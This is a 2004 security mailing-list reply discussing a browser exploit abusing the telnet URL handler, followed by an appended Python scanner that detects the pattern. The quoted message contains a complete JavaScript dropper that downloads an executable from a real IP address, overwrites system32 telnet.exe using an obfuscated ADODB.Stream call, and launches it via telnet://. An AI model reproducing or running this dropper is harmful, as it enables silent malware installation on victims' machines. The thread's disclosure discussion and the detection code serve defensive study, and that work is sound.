Message-ID: <200407210225.i6L2PXqb029710@cairo.anu.edu.au>
From: avalon at cairo.anu.edu.au (Darren Reed)
Subject: telnet URL type used in exploit

Michael,

Out of curiosity, I tested this with IE 6.0.2800.1106.xpsp2.030422-1633
and got a popup box saying:

"This page is accessing information that is not under its
control. This poses a security risk. Do you want to
continue?" [Yes] [No]

And that was loading it into IE as a *local file*...when I put it on
a web page, I got the usual half dozen alerts about "do you want to run
javascript", etc. that even if I said yes to it didn't work.  

Did you get that popup box when you tested your script below?

Darren

> In reply to the discussion found at: 
> 
> http://seclists.org/lists/fulldisclosure/2004/Jul/0528.html
> 
> the consensus seems to be that there are no obvious ways to exploit the
> mentioned URL types, such as tn3270, telnet, LDAP, rlogin etc. While
> these may not be exploitable per se, they certainly are when used in
> conjunction with other known exploits. Take the following code for
> example:
> 
> var downloadurl="http://213.159.117.133/dl/loadadv74.exe";
> 
> if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1)
> savetopath="C:\\WINDOWS\\system32\\telnet.exe";
> 
> if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1)
> savetopath="C:\\WINNT\\system32\\telnet.exe";
> 
> payloadURL = downloadurl;
> 
> var x = new ActiveXObject("Microsoft.XMLHTTP");
> x.Open("GET",payloadURL,0);
> x.Send();
> 
> function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t"
> + "r" + "e" + "a" + "m"; }
> var s = new ActiveXObject(bla());
> 
> s.Mode = 3;
> s.Type = 1;
> s.Open();
> s.Write(x.responseBody);
> s.SaveToFile(savetopath,2);
> 
> location.href = "telnet://";
> 
> The JavaScript overwrites telnet.exe with a downloaded executable and
> then runs it by pointing the browser at telnet://. Instead of
> launching a telnet shell as expected, the attacker's code is executed.
> This is not only an example of the telnet URL type being involved in
> an exploit, but one that actually relies on it.
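Added example (not part of the thread): the quoted script hides the "ADODB.Stream" ProgID behind a chain of one-character string concatenations, so a plain substring match on page content never sees it. This Python scanner folds such concatenations back into one literal before matching, then flags the combination the message describes (XMLHTTP fetch, ADODB.Stream written to a system32 binary, launch via a telnet: URL). The sample page is constructed from the quoted script with a placeholder download host.

```python
import re

# Two adjacent string literals joined by "+", e.g. "A" + "D"; folded repeatedly
# until no pair is left, so "A" + "D" + "O" + ... becomes "ADODB.Stream".
_CONCAT = re.compile(r'(["\'])([^"\']*)\1\s*\+\s*(["\'])([^"\']*)\3')

def normalize_js(src: str) -> str:
    """Fold chains of string-literal concatenation into single literals."""
    prev = None
    while prev != src:
        prev = src
        src = _CONCAT.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', src)
    return src

# Indicators taken from the dropper pattern in the quoted message.
INDICATORS = {
    "xmlhttp_fetch": re.compile(r"Microsoft\.XMLHTTP", re.I),
    "adodb_stream": re.compile(r"ADODB\.Stream", re.I),
    "save_to_file": re.compile(r"\.SaveToFile\s*\(", re.I),
    "system_binary_path": re.compile(r'system32\\\\[^"\']+\.exe', re.I),
    "telnet_url_launch": re.compile(r"location\.href\s*=\s*[\"']telnet:", re.I),
}

def scan(src: str) -> dict:
    """Return which indicators are present after de-obfuscation."""
    norm = normalize_js(src)
    return {name: bool(rx.search(norm)) for name, rx in INDICATORS.items()}

def is_dropper(src: str) -> bool:
    """Flag a page that writes a fetched body to disk and launches it via a URL handler."""
    hits = scan(src)
    return hits["adodb_stream"] and hits["save_to_file"] and hits["telnet_url_launch"]

# Constructed sample: the quoted script with the real download host replaced.
SAMPLE = r'''
var downloadurl="http://PLACEHOLDER-HOST/dl/payload.exe";
savetopath="C:\\WINDOWS\\system32\\telnet.exe";
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",downloadurl,0); x.Send();
function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t"
+ "r" + "e" + "a" + "m"; }
var s = new ActiveXObject(bla());
s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody);
s.SaveToFile(savetopath,2);
location.href = "telnet://";
'''

if __name__ == "__main__":
    print(scan(SAMPLE), is_dropper(SAMPLE))
```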

